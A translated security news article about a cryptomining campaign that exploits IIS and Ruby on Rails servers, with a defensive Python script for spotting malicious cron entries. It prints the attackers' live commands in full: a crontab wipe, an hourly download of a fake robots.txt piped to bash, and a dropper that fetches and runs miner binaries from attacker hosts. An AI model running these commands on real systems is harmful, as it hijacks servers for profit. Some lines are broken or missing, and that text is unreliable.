Attacks on web servers: check your robots.txt file, because it can hide a Monero miner
Check Point has observed attacks that use vulnerabilities in web servers (Microsoft IIS and Ruby on Rails) to infect as many machines as possible with the XMRig Monero-mining script. Within a few hours of the publication of the first analysis, more than 700 servers around the world had been infected. Most of the infected sites are located in the United States, Germany, Great Britain, Norway and Sweden, although according to Check Point there may not be a single country without infections.
If a server vulnerable to one of these flaws (CVE-2005-267) is found, the attacker first runs code in a POST request that fetches the final payload:
To inject PHP code on Ruby on Rails and Microsoft IIS servers, the attacker uses the vulnerabilities CVE-2013-0156 and CVE-2005-2678 with the same payload as for Apache, but base64-encoded:
The decoded payload looks like this:
system('crontab -r; wget -V && echo "1 * * * * wget -q -O - http://internetresearch.is/robots.txt 2>/dev/null | bash >/dev/null 2>&1" | crontab -; wget -V || curl -V | echo "1 * * * * curl -s http://internetresearch.is/robots.txt 2>/dev/null | bash >/dev/null 2>&1" | crontab -')
On the server the payload first executes crontab -r, which removes all existing cron jobs, and then adds its own:
echo "1 * * * * wget -q -O - hxxp://internetresearch.is/robots.txt 2>/dev/null | bash >/dev/null 2>&1" | crontab -
The "infected" server thus tries, in the first minute of every hour, to download a modified robots.txt file (a file normally used to control web crawlers, e.g. to keep an entire site or selected links out of search indexes) from a domain the attacker has put online, and to execute it with bash. The code placed in that robots.txt looks similar to this:
x86_64="http://internetresearch.is/sshd"
i686="http://internetresearch.is/sshd.i686"
touch test || cd /dev/shm || cd /tmp 2>/dev/null > $MAIL && chmod 000 $MAIL
rm .test 2>/dev/null >/dev/null 2, sshd rm
pkill -9 xmrig 2>/dev/null
pid=$(pgrep -f -o 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8')
test $pid && pgrep -f 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' | grep -vw $pid | xargs -r kill -9
pgrep -f tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 && exit 0
wget --no-check-certificate "$x86_64" -o .sshd || curl -k "$x86_64" -o .sshd
wget --no-check-certificate "$i686" -o .sshd.i686 || curl -k "$i686" -o .sshd.i686
chmod +x .sshd .sshd.i686
pgrep -f hashvault || ./.sshd -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B || wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -r)" || curl http://lochjol.com/FAIL --user-agent "$(uname -r)"
pgrep -f hashvault || ./.sshd.i686 -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B || wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -a)" || curl http://lochjol.com/FAIL --user-agent "$(uname -a)"
Experts point out that the attacker uses the trick of re-running the code from robots.txt every hour so that the commands can be modified at any time, e.g. to stop mining Monero when necessary.
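The cron job described above is the part of this campaign an administrator can check for directly. As an added example, not code from the article or from Check Point, the Python below scans `crontab -l` output for entries that download remote content and pipe it into a shell, or that use a file such as robots.txt as a command source; the sample crontab, including its hxxp-defanged entry, is constructed for this illustration.

```python
import re
from typing import Dict, List

# Constructed sample of `crontab -l` output (not taken from any real server):
# one entry modelled on the cron job described in the article, a defanged
# variant using curl, and two ordinary maintenance jobs.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
1 * * * * wget -q -O - hxxp://internetresearch.is/robots.txt 2>/dev/null | bash >/dev/null 2>&1
*/5 * * * * /usr/local/bin/backup.sh >> /var/log/backup.log
@hourly curl -s http://example.invalid/robots.txt | sh
"""

# Schedule is either @reboot/@hourly/... or five whitespace-separated fields.
CRON_ENTRY = re.compile(
    r"^(?P<schedule>@\w+|\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(?P<command>.+)$"
)
DOWNLOADER = re.compile(r"\b(?:wget|curl)\b")
# A shell reading its script from a pipe: "| bash", "| sh", "| /bin/bash".
PIPED_TO_SHELL = re.compile(r"\|\s*(?:/\S*/)?(?:ba|z|da)?sh\b")
# Files that are never legitimate shell scripts, used as the command source.
ODD_SOURCE = re.compile(r"robots\.txt|\.(?:jpg|png|gif|ico)\b", re.I)


def suspicious_cron_entries(crontab_text: str) -> List[Dict[str, str]]:
    """Return cron entries that fetch remote content and feed it to a shell."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        match = CRON_ENTRY.match(line)
        if not match:
            continue
        command = match.group("command")
        reasons = []
        if DOWNLOADER.search(command) and PIPED_TO_SHELL.search(command):
            reasons.append("remote download piped into a shell")
        if ODD_SOURCE.search(command):
            reasons.append("non-script file used as command source")
        if reasons:
            findings.append({"schedule": match.group("schedule"),
                             "command": command,
                             "reasons": "; ".join(reasons)})
    return findings
```

Run it over `crontab -l` for every user and over the files under /etc/cron.d; a hit on a web server's crontab is a strong sign the machine is already compromised and needs the rest of the dropper (the .sshd binaries in /tmp or /dev/shm) looked for as well.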
Based on the Monero wallet address it was possible to determine that within 24 hours approximately 700 servers had been infected, which brought the attackers about 540 dollars in income.
The case presented here is nothing new. More and more often we see cybercriminals interested in monetizing their victims' computing power in this way. According to ESET statistics, attackers follow the trends and are shifting from extorting ransom by encrypting files (ransomware) to cryptocurrency mining. To confirm this thesis, just look at the chart below for our country:
A similar incident involving a Monero miner recently affected the BlackBerry.com website, as well as the Polish news service Rzeczpospolita.pl.
This and similar attacks can be prevented. We advise administrators to take care of systematically updating the applications installed on the server, as well as the scripts and extensions added to websites. For home users we recommend reputable antivirus software, necessarily one with browser protection; only then will it be able to detect and block the malicious script. For those who do not want to use an AV, we recommend one of the ad blockers (preferably uBlock) or the NoCoin extension, which is available for Chrome/Chromium, Firefox and Opera.
We use the Google Cloud Translation and Gengo APIs to translate articles, with the exception of our comparative tests.